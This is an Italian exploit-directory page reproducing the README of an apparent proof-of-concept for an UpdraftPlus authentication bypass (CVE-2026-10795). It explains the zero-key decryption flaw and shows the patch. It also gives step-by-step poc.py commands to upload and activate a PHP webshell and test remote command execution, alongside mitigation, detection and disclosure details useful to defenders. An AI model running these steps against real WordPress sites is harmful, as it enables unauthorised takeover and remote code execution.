Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-10795 — CVE-2026-10795 – UpdraftPlus Bypass dell'autenticazione | Kitploit
Strumenti/GitHubGitHub/izxci/cve-2026-10795
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneSviluppo Payload
GitHubizxci/cve-2026-10795

CVE-2026-10795

CVE-2026-10795 – UpdraftPlus Bypass dell'autenticazione

Vedi Repository
12 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-10795

CVE-2026-10795 – Bypass di autenticazione in UpdraftPlus

CVE-2026-10795 – PoC per il bypass di autenticazione in UpdraftPlus

⚠️ Disclaimer: Questo repository è solo a scopo educativo.
Usalo esclusivamente su sistemi di tua proprietà o per i quali hai ricevuto esplicita autorizzazione.
L'autore non è responsabile per un uso improprio.


📋 Panoramica

Scarica lo strumento
CampoDettagli
PluginUpdraftPlus: WP Backup & Migration
Versioni affette≤ 1.26.4
Versione corretta1.26.5
Punteggio CVSS8.1 (Alto)
Tipo di vulnerabilitàBypass di autenticazione non autenticato → Esecuzione Remota di Comandi (RCE)
Scoperta davtim (Wordfence Bug Bounty)
Bounty$5.200

🔍 Riepilogo della vulnerabilità

UpdraftPlus registra un listener RPC non autenticato ad ogni caricamento di pagina per i siti collegati a UpdraftCentral.

La funzione decrypt_message() non convalida il valore restituito da $rsa->decrypt().
Quando la decifratura RSA fallisce, false viene passato a Rijndael::setKey(), riducendosi a una chiave AES-128 deterministica composta da tutti zeri.

Un attaccante può:

  1. Creare un udrpc_message cifrato con la chiave zero
  2. Far sì che il server lo decifri con successo
  3. Eseguire comandi RPC arbitrari come amministratore collegato
  4. Caricare e attivare un plugin malevolo → Esecuzione Remota di Comandi

🧬 Codice vulnerabile

root@kitploit:~
// updraftplus/includes/class-remote-communications-v2.php
// Righe 460-491 (versione 1.26.4)

$sym_key = $rsa->decrypt($sym_key);
// ❌ Nessun controllo sul valore restituito!

$rij->setKey($sym_key);  // false → chiave tutta zeri
return $rij->decrypt($ciphertext);

✅ Codice corretto

root@kitploit:~
$sym_key = $rsa->decrypt($sym_key);

// ✅ Aggiunto nella versione 1.26.5
if (false === $sym_key || !is_string($sym_key) || strlen($sym_key) < 16) {
    return false;
}

$rij->setKey($sym_key);
return $rij->decrypt($ciphertext);

📁 Struttura del repository

root@kitploit:~
updraftplus-auth-bypass/
├── README.md
├── poc.py                  # Script principale dell'exploit
├── requirements.txt        # Dipendenze Python
├── payloads/
│   ├── list_plugins.py     # Elenca i plugin installati
│   ├── upload_shell.py     # Carica un webshell come plugin
│   └── activate_plugin.py  # Attiva il plugin caricato
├── shell/
│   ├── build_shell.py      # Crea lo ZIP del webshell
│   └── test-shell.php      # Webshell PHP minimale
└── docs/
    ├── technical-analysis.md
    └── patch-diff.md

⚙️ Installazione

root@kitploit:~
git clone https://github.com/yourname/updraftplus-auth-bypass
cd updraftplus-auth-bypass
pip install -r requirements.txt

requirements.txt

root@kitploit:~
requests==2.31.0
pycryptodome==3.20.0

🧪 Impostazione dell'ambiente di test

1. Installa XAMPP

root@kitploit:~
https://www.apachefriends.org
Avvia: Apache + MySQL

2. Installa WordPress + UpdraftPlus 1.26.4

root@kitploit:~
# Posiziona WordPress in htdocs
C:/xampp/htdocs/wordpress/

# Installa la versione vulnerabile del plugin
# Scarica: https://plugins.trac.wordpress.org/browser/updraftplus/tags/1.26.4

3. Collega a UpdraftCentral

root@kitploit:~
WordPress Admin → Impostazioni → UpdraftPlus → scheda UpdraftCentral → Connetti

⚠️ Richiesto: Il sito deve essere collegato a UpdraftCentral affinché la vulnerabilità sia sfruttabile.


🚀 Utilizzo

Utilizzo base

root@kitploit:~
python poc.py --url http://localhost/wordpress/ --user-id 1

Elenca i plugin

root@kitploit:~
python poc.py --url http://localhost/wordpress/ --cmd plugin.get_plugins

Carica webshell

root@kitploit:~
# Passo 1: Crea lo ZIP del webshell
python shell/build_shell.py

# Passo 2: Carica
python poc.py --url http://localhost/wordpress/ --cmd upload_shell

# Passo 3: Attiva
python poc.py --url http://localhost/wordpress/ --cmd activate_shell

# Passo 4: Test RCE
curl "http://localhost/wordpress/wp-content/plugins/test-shell/test-shell.php?cmd=whoami"

🔬 Come funziona

root@kitploit:~
poc.py
  │
  ├─ 1. Crea una chiave simmetrica RSA cifrata malformata (byte spazzatura)
  │
  ├─ 2. Cifra il payload RPC con la chiave AES-128 ZERO (0x00 * 16)
  │
  ├─ 3. Costruisce udrpc_message:
  │       [3 byte hex lunghezza][fake_sym_key][16 byte hex lunghezza cipher][ciphertext]
  │
  ├─ 4. POST al target (nessuna autenticazione, nonce o cookie necessari)
  │
  └─ 5. Lato server:
          rsa->decrypt(spazzatura) → false
          setKey(false)         → chiave 0x00
          decrypt(ciphertext)   → il nostro payload ✅
          wp_set_current_user() → accesso admin
          Il comando RPC esegue  → RCE 💀

🛡️ Rilevamento e mitigazione

Mitigazione

root@kitploit:~
Aggiornare immediatamente UpdraftPlus alla versione 1.26.5.

Rilevamento (analisi dei log)

root@kitploit:~
# Cerca richieste POST sospette con udrpc_message
grep "udrpc_message" /var/log/apache2/access.log

# Gli utenti di Wordfence sono protetti dal 3 giugno 2026

Indicatori di compromissione

root@kitploit:~
- Installazioni di plugin inaspettate
- Nuovi file PHP in wp-content/plugins/
- Richieste POST alla root di WordPress con parametro udrpc_message
- Azioni di livello admin inaspettate nei log di WordPress

📅 Cronologia della divulgazione

DataEvento
1 giugno 2026Vulnerabilità inviata tramite Wordfence Bug Bounty
3 giugno 2026Validata e divulgata al fornitore
3 giugno 2026Regola firewall Wordfence Premium implementata
4 giugno 2026Fornitore ha preso atto
5 giugno 2026Patch rilasciata (v1.26.5)
3 luglio 2026Protezione Wordfence Free attiva

📚 Riferimenti

  • Avviso Wordfence
  • Pagina del plugin UpdraftPlus
  • Documentazione RSA di phpseclib
  • Changelog del plugin

👤 Crediti

  • Scoperta originale: vtim (Programma Bug Bounty di Wordfence)
  • Autore del PoC: izxci
  • Scopo: Educativo / Ricerca sulla sicurezza

📜 Licenza

root@kitploit:~
Licenza MIT – Solo per uso educativo.
L'uso non autorizzato contro sistemi di cui non si è proprietari è illegale.